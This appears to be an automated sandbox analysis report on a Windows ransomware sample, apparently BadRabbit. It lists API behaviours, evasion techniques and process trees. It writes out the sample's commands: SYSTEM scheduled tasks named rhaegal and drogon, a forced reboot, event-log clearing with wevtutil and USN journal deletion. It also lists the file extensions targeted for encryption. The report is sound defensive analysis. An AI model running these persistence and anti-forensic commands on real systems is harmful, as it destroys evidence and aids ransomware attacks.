Source: i0YxTJ2SO.exe, rundll32.exe, infpub.dat.1.dr	Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERM

Classification label

Show sources

Source: classification engine

Classification label: mal84.evad.spre.expl.rans.winEXE@35/5@0/4

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00477CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,

3_2_00477CC5

Contains functionality to create services

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		3_2_00471368
Source: C:\Windows\System32\rundll32.exe	Code function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,		3_2_00479534

Contains functionality to enum processes or threads

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_004784EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

3_2_004784EE

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00478313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_00478313

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Windows\System32\rundll32.exe

3_2_00479534

Found command line output

Show sources

Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.~u..0.....E.R.R.O.R.:. .............................}u..........#...}u.... .....i.,.#.G..v..#...........#.....
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.~u..0.................=.................................W...#.....................g_v.`.#.....X...j..u..(.....
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.~u..0.............0...L...........................`.....0...2...2..................................{{.....G..v
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.~u..0.............0...n...........................`.....1...3.x.3.......$...............$.........3p....$.G..v
Source: C:\Windows\System32\shutdown.exe	Console Write: ..............".....A. .s.y.s.t.e.m. .s.h.u.t.d.o.w.n. .i.s. .i.n. .p.r.o.g.r.e.s.s...(.1.1.1.5.)...P.".P...@.".....6...

PE file has an executable .text section and no other executable section

Show sources

Source: i0YxTJ2SO.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Show sources

Source: C:\Windows\System32\LogonUI.exe

File read: C:\Windows\win.ini

Reads software policies

Show sources

Source: C:\Users\user\Desktop\i0YxTJ2SO.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Runs a DLL by calling functions

Show sources

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\i0YxTJ2SO.exe 'C:\Users\user\Desktop\i0YxTJ2SO.exe'
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Source: unknown	Process created: C:\Windows\9706.tmp 'C:\Windows\9706.tmp' \\.\pipe\{EE91B260-F47B-4E8B-B208-21BD25A3C0CE}
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: unknown	Process created: C:\Windows\System32\shutdown.exe C:\Windows\system32\shutdown.exe /r /t 0 /f
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN drogon
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: unknown	Process created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0
Source: unknown	Process created: C:\Windows\System32\schtasks.exe unknown
Source: unknown	Process created: C:\Windows\System32\fsutil.exe unknown
Source: C:\Users\user\Desktop\i0YxTJ2SO.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\9706.tmp 'C:\Windows\9706.tmp' \\.\pipe\{EE91B260-F47B-4E8B-B208-21BD25A3C0CE}
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN drogon
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe unknown

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\schtasks.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Show sources

Source: infpub.dat.1.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995711959814

Contains functionality to call native functions

Show sources

Source: C:\Windows\9706.tmp	Code function: 10_2_01301D4C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,		10_2_01301D4C
Source: C:\Windows\9706.tmp	Code function: 10_2_0130184E NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,		10_2_0130184E

Contains functionality to delete services

Show sources

Source: C:\Windows\System32\rundll32.exe

3_2_00479534

Contains functionality to launch a process as a different user

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00479B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,

3_2_00479B63

Contains functionality to shutdown / reboot the system

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00478A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,

3_2_00478A23

Creates files inside the system directory

Show sources

Source: C:\Users\user\Desktop\i0YxTJ2SO.exe

File created: C:\Windows\infpub.dat

Creates mutexes

Show sources

Source: C:\Windows\System32\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\85427E2A3AD6FDE5

Deletes Windows files

Show sources

Source: C:\Windows\System32\rundll32.exe

File deleted: C:\Windows\infpub.dat

Enables security privileges

Show sources

Source: C:\Windows\System32\wevtutil.exe

Process token adjusted: Security

PE file contains strange resources

Show sources

Source: i0YxTJ2SO.exe	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: i0YxTJ2SO.exe	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

PE file has an invalid certificate

Show sources

Source: i0YxTJ2SO.exe

Static PE information: invalid certificate

Reads the hosts file

Show sources

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Sample file is different than original file name gathered from version info

Show sources

Source: i0YxTJ2SO.exe	Binary or memory string: OriginalFilenameFlashUtil.exev+ vs i0YxTJ2SO.exe
Source: i0YxTJ2SO.exe	Binary or memory string: OriginalFilenameFlashUtil.exev+ vs i0YxTJ2SO.exe

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\i0YxTJ2SO.exe

File read: C:\Users\user\Desktop\i0YxTJ2SO.exe

Contains functionality to create processes via WMI

Show sources

Source: i0YxTJ2SO.exe

Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERM

Uses shutdown.exe to shutdown or reboot the system

Show sources

Source: unknown

Process created: C:\Windows\System32\shutdown.exe C:\Windows\system32\shutdown.exe /r /t 0 /f

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00476FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,

3_2_00476FFE

Contains functionality to create a new security descriptor

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0047841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,

3_2_0047841D

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Users\user\Desktop\i0YxTJ2SO.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\9706.tmp 'C:\Windows\9706.tmp' \\.\pipe\{EE91B260-F47B-4E8B-B208-21BD25A3C0CE}
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c schtasks /Delete /F /TN drogon
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe unknown

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\i0YxTJ2SO.exe	Code function: 1_2_003E1499 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_003E1499
Source: C:\Windows\9706.tmp	Code function: 10_2_01304D59 SetUnhandledExceptionFilter,	10_2_01304D59
Source: C:\Windows\9706.tmp	Code function: 10_2_01304B37 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_01304B37
Source: C:\Windows\9706.tmp	Code function: 10_2_0130601E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0130601E

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\rundll32.exe

System information queried: KernelDebuggerInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Windows\9706.tmp

Code function: 10_2_01304B37 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_01304B37

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00479016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,

3_2_00479016

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\Desktop\i0YxTJ2SO.exe

Code function: 1_2_003E1690 GetProcessHeap,

1_2_003E1690

Enables debug privileges

Show sources

Source: C:\Windows\System32\rundll32.exe	Process token adjusted: Debug
Source: C:\Windows\9706.tmp	Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00475E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,

3_2_00475E9F

Contains functionality to query system information

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00475BC4 GetSystemInfo,__alldiv,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,

3_2_00475BC4

Program exit points

Show sources

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-4855
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-4748
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-4766

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\rundll32.exe

Process information queried: ProcessInformation

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 2000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 500
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 1000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 300000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 900000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 3000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 10000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 500

Found decision node followed by non-executed suspicious APIs

Show sources

Source: C:\Windows\System32\rundll32.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-5612

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Windows\dispci.exe
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Windows\cscc.dat
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Windows\9706.tmp

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\rundll32.exe TID: 3468	Thread sleep time: -2000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3540	Thread sleep time: -5000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3548	Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3628	Thread sleep time: -300000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3468	Thread sleep time: -900000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3544	Thread sleep time: -540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3468	Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3624	Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3544	Thread sleep time: -180000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 3540	Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\LogonUI.exe TID: 3960	Thread sleep time: -60000s >= -60s

Found evasive API chain (may stop execution after checking computer name)

Show sources

Source: C:\Windows\System32\rundll32.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

graph_3-4844

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Windows\System32\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_3-4847

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Windows\9706.tmp

Code function: 10_2_013025AC GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_013025AC

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC

Show sources

Source: C:\Windows\System32\rundll32.exe

3_2_00476FFE

Contains functionality to query local / system time

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00478192 GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,

3_2_00478192

Contains functionality to query time zone information

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_004757E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,

3_2_004757E5

Contains functionality to query windows version

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00471531 GetVersion,

3_2_00471531

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
10:18:44	API Interceptor	1x Sleep call for process: rundll32.exe modified from: 900000ms to: 500ms
10:18:44	API Interceptor	1x Sleep call for process: rundll32.exe modified from: 300000ms to: 500ms
10:18:46	Task Scheduler	Run new task: drogon path: C:\Windows\system32\shutdown.exe s>/r /t 0 /f
10:36:00	API Interceptor	4x Sleep call for process: rundll32.exe modified from: 180000ms to: 500ms
10:36:03	API Interceptor	1x Sleep call for process: LogonUI.exe modified from: 60000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

Startup

System is w7_1

i0YxTJ2SO.exe (PID: 3432 cmdline: 'C:\Users\user\Desktop\i0YxTJ2SO.exe' MD5: FBBDC39AF1139AEBBA4DA004475E8839)

rundll32.exe (PID: 3464 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cmd.exe (PID: 3476 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: AD7B9C14083B52BC532FBA5948342B98)

schtasks.exe (PID: 3496 cmdline: schtasks /Delete /F /TN rhaegal MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

cmd.exe (PID: 3512 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit' MD5: AD7B9C14083B52BC532FBA5948342B98)

schtasks.exe (PID: 3568 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

